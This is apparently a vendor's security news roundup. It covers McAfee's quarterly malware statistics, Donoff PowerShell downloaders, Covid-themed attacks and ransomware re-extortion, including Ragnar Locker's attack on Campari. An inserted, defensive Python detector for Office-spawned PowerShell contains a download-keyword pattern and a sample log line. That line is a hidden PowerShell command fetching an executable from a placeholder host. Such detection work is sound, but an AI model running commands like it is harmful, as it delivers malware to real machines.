Cyberthreats increased at a disturbing rate in the second quarter of the year: more than 400 new cyberthreats were recorded every minute, according to a new report from cybersecurity firm McAfee. New malware samples also grew by 11.5 percent for the period.
PowerShell malware and Covid-19-themed attacks dominated the landscape. Malicious Donoff Office document attacks propelled new PowerShell malware upwards by 117 percent. The documents behave as Trojan downloaders: they use the Windows command shell to launch PowerShell, which then downloads and executes malicious files.
McAfee claims Donoff also played a “critical role” in driving the 689 percent surge in PowerShell malware in the quarter before this one.
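As an added, defender-side example (written here, not code from McAfee or the original article): a small Python detector that flags the Office document -> cmd.exe -> PowerShell process chain described above, run over constructed Sysmon-style process-creation records. The record format, field names and command lines are assumptions made for the example.

```python
import re

# Parents that should rarely spawn a command shell or PowerShell.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe"}  # tolerated intermediary between Office and PowerShell
# Download-and-run hints in a PowerShell command line (not exhaustive).
DOWNLOAD_HINT = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|\bcurl\b|\bwget\b", re.IGNORECASE)

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_LOG = [
    "pid=1000|ppid=1|image=C:\\Windows\\explorer.exe|cmdline=explorer.exe",
    "pid=2000|ppid=1000|image=C:\\Program Files\\Microsoft Office\\WINWORD.EXE|cmdline=WINWORD.EXE /n invoice.doc",
    "pid=2100|ppid=2000|image=C:\\Windows\\System32\\cmd.exe"
    "|cmdline=cmd.exe /c powershell -w hidden -c Invoke-WebRequest ...",
    "pid=2200|ppid=2100|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/p -OutFile p.exe",
    "pid=3000|ppid=1000|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell.exe -File C:\\scripts\\backup.ps1",  # benign: started from explorer
]

def parse_event(line):
    """Parse one 'key=value|key=value' record into a dict; image becomes a lower-case basename."""
    f = dict(part.split("=", 1) for part in line.strip().split("|"))
    return {"pid": int(f["pid"]), "ppid": int(f["ppid"]),
            "image": f["image"].rsplit("\\", 1)[-1].lower(), "cmdline": f["cmdline"]}

def find_office_powershell_chains(lines):
    """Alert on powershell.exe whose parent, or grandparent via cmd.exe, is an Office app."""
    by_pid = {e["pid"]: e for e in map(parse_event, lines)}
    alerts = []
    for ev in by_pid.values():
        if ev["image"] != "powershell.exe":
            continue
        chain, cur = [ev["image"]], by_pid.get(ev["ppid"])
        for _ in range(2):                  # walk at most two hops up the process tree
            if cur is None:
                break
            chain.append(cur["image"])
            if cur["image"] in OFFICE_APPS:
                alerts.append({"pid": ev["pid"], "chain": " <- ".join(chain),
                               "downloader": bool(DOWNLOAD_HINT.search(ev["cmdline"]))})
                break
            if cur["image"] not in SHELLS:  # anything but cmd.exe ends the walk
                break
            cur = by_pid.get(cur["ppid"])
    return alerts
```

On the sample records only the PowerShell instance spawned through cmd.exe from WINWORD.EXE is flagged; the backup script started from explorer.exe is left alone.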
Covid-19 was another theme exploited by cybercriminals in the second quarter of the year. McAfee’s network, which has more than a billion sensors, registered a 605 percent increase in Covid-19-related attacks compared to Q1.
“… a deluge of malicious URLs, attacks on cloud users and capable threat actors leveraging the world’s thirst for more information on Covid-19 as an entry mechanism into systems across the globe,” said Raj Samani, McAfee Fellow and Chief Scientist.
McAfee said there were almost 7.5 million external attacks on cloud user accounts in the quarter. According to the firm, all major industries were affected, including financial services, healthcare, the public sector, education, retail, technology and more.
In 2019, the Maze ransomware group introduced a new tactic known as double extortion, in which attackers steal unencrypted files and then threaten to release them publicly if a ransom is not paid. Other ransomware operations followed, creating data leak sites used to publish victims’ stolen files. As part of this double-extortion tactic, most ransomware operations require a victim to pay a single ransom that provides both a decryptor for their encrypted files and a promise to delete, and not share, the stolen files. Some ransomware operations, like AKO/Ranzy, demand two ransom payments: one for the decryptor and another not to publish stolen data. Ransomware gangs are increasingly failing to keep their promise to delete stolen data after a victim pays.
In the recently released Coveware Q3 2020 ransomware report, we learn that some ransomware gangs do not keep their promise to delete stolen data after a ransom is paid. Certain groups are leaking stolen data after a ransom was paid, using fake data as proof of deletion, or even re-extorting a victim using the same data that was paid not to be released.
– Sodinokibi: Victims that paid were re-extorted weeks later with threats to post the same data set.
– Netwalker: Data posted of companies that had paid for it not to be leaked.
– Mespinoza: Data posted of companies that had paid for it not to be leaked.
– Conti: Fake files are shown as proof of deletion.
Unlike a ransomware decryptor, which a threat actor can’t take back once given, there is no way for a victim to know for sure whether a ransomware operation deletes stolen data after a ransom payment is made. Because of this, Coveware says that it does not make sense to pay a ransom, as there is no way to know for sure the data will not be used to extort you further in the future. With this in mind, Coveware tells victims to expect the following even if they do decide to pay so their data is not released:
– The data may not be credibly deleted. Victims should assume it will be traded to other threat actors, sold, or held for a second/future extortion attempt
– Stolen data custody is held by multiple parties and is not secured. Even if the threat actor deletes a volume of data following a payment, other parties that had access to it may already have made copies so that they can extort the victim in the future
– The data may get posted anyway by mistake or on purpose before a victim can even respond to an extortion attempt
Companies should automatically assume that their data has been shared among multiple threat actors and that it will be used or leaked in some manner in the future, regardless of whether they paid. They should treat the attack as a data breach and properly inform all customers, employees, and business partners that their data was stolen as required by law.
Doing this may be embarrassing and painful, but at least the companies look better for trying to do the right thing, and it gives those who were exposed the ability to monitor and protect their accounts from fraud.
A recent example of such an attack is Campari Group, an Italian beverage company known for its popular liquor brands, including Campari, Frangelico, SKYY vodka, Espolòn, Wild Turkey and Grand Marnier. It was recently hit by a Ragnar Locker ransomware attack, in which 2 TB of unencrypted files were allegedly stolen. To recover their files, Ragnar Locker is demanding $15 million.
As proof that they stole data, the ransom note contains eight URLs to screenshots of some of the stolen data. These screenshots are for sensitive documents, such as bank statements, a UK passport, employee U.S. W-4 tax forms, a spreadsheet containing SSNs, and a confidentiality agreement.
Ragnar Locker claims to have encrypted most of Campari Group’s servers in twenty-four countries and is demanding $15,000,000 in bitcoin for a decryptor. This price also includes a promise to delete the data from their file servers and not publish or share it, as well as a network penetration report and recommendations to improve security.
Ragnar Locker has been involved in other large attacks this year, including ones on Portuguese multinational energy giant Energias de Portugal (EDP) and French maritime transport and logistics company CMA CGM.
We advise all companies to regularly review and update their security policies, training and cyberdefence solutions.
Ask us about endpoint solutions, or consider whether managed cloud-hosted systems are preferable.